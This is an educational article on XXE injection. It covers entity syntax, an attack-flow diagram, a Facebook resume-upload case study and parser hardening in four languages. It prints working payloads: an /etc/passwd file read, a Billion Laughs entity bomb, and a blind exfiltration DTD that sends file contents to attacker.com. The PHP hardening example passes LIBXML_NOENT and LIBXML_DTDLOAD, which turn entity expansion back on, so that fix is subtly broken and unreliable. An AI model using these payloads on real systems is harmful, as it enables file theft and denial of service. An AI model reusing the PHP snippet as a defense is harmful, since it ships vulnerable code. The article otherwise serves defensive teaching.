XML External Entity (XXE) Injection
1. Definition
XML External Entity (XXE) Injection is a vulnerability that targets applications parsing XML input. It exploits a feature of XML called “external entities” to:
- Read arbitrary files from the server
- Perform Server-Side Request Forgery (SSRF)
- Execute denial-of-service attacks
- In some cases, achieve remote code execution
XXE vulnerabilities arise when XML parsers are configured to process external entity declarations, which can reference local files or remote URLs.
2. Technical Explanation
XML allows defining entities as shortcuts for content. External entities can reference content from outside the XML document.
Basic XML Entity Syntax:
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY myEntity "Hello World">
]>
<root>&myEntity;</root>External Entity (XXE) Payload:
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>When parsed, &xxe; is replaced with the contents of /etc/passwd.
Common XXE Attack Types:
- File Disclosure: Read sensitive files (
/etc/passwd, config files, source code). - SSRF: Make requests to internal services (
http://169.254.169.254/). - Blind XXE: Exfiltrate data via out-of-band channels when output is not returned.
- Billion Laughs (DoS): Exponentially expanding entities crash the parser.
Billion Laughs Attack:
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
]>
<root>&lol4;</root>This small payload expands to gigabytes of data in memory.
3. Attack Flow
sequenceDiagram
participant Attacker
participant WebApp as Web Application
participant XMLParser as XML Parser
participant FileSystem as File System
Attacker->>WebApp: POST /api/upload<br/>Content-Type: application/xml
Note over Attacker: XML payload with<br/>external entity definition
WebApp->>XMLParser: Parse XML input
XMLParser->>XMLParser: Process DOCTYPE declaration<br/>Found external entity
XMLParser->>FileSystem: Read file:///etc/passwd
FileSystem-->>XMLParser: File contents returned
XMLParser-->>WebApp: Parsed XML with file contents
WebApp-->>Attacker: Response contains /etc/passwd4. Real-World Case Study: Facebook XXE (2014)
Target: Facebook’s careers portal. Vulnerability Class: Blind XXE via Word document upload.
The Vulnerability: Facebook’s careers page allowed users to upload resumes. The application accepted .docx files, which are actually ZIP archives containing XML files. The XML parser processing these files had external entity processing enabled.
The Attack: Security researcher Mohamed Ramadan discovered that:
.docxfiles contain XML files (e.g.,word/document.xml).- He crafted a malicious
.docxwith XXE payload in the XML. - The payload referenced an external URL he controlled.
- When Facebook parsed the document, it made a request to his server.
Blind XXE Exfiltration: Since the file contents were not directly returned, he used parameter entities to exfiltrate data:
<!DOCTYPE foo [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
%dtd;
]>The external DTD (evil.dtd) contained:
<!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker.com/?data=%file;'>">
%all;Impact: This allowed reading arbitrary files from Facebook’s servers. Mohamed received a $33,500 bounty, and Facebook patched the vulnerability by disabling external entity processing.
5. Detailed Defense Strategies
A. Disable External Entity Processing
The most effective defense is to disable external entities entirely.
Java (DocumentBuilderFactory):
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);Python (lxml):
from lxml import etree
parser = etree.XMLParser(resolve_entities=False, no_network=True)
tree = etree.parse(xml_file, parser)PHP:
libxml_disable_entity_loader(true);
$doc = new DOMDocument();
$doc->loadXML($xml, LIBXML_NOENT | LIBXML_DTDLOAD);.NET:
XmlReaderSettings settings = new XmlReaderSettings();
settings.DtdProcessing = DtdProcessing.Prohibit;
settings.XmlResolver = null;
XmlReader reader = XmlReader.Create(stream, settings);B. Use Less Complex Data Formats
If possible, avoid XML entirely for user input.
- JSON: Does not have entity processing features.
- YAML: Simpler structure (but has its own security concerns).
- Protocol Buffers / MessagePack: Binary formats without these risks.
C. Input Validation
If XML is required, validate and sanitize input.
- Schema Validation: Use XSD to enforce structure.
- Strip DOCTYPE: Remove or reject XML with DOCTYPE declarations.
- Content-Type Checking: Ensure uploaded files match expected types.
D. Web Application Firewall (WAF)
Configure WAF rules to detect XXE patterns.
- Block requests containing
<!ENTITY,<!DOCTYPE,SYSTEM,PUBLIC. - Be aware that attackers may use encoding to bypass simple pattern matching.
E. Least Privilege
Limit the XML parser’s access.
- Filesystem: Run parser in sandboxed environment with minimal file access.
- Network: Block outbound connections from XML processing services.
- User Permissions: Parser process should not run as root.
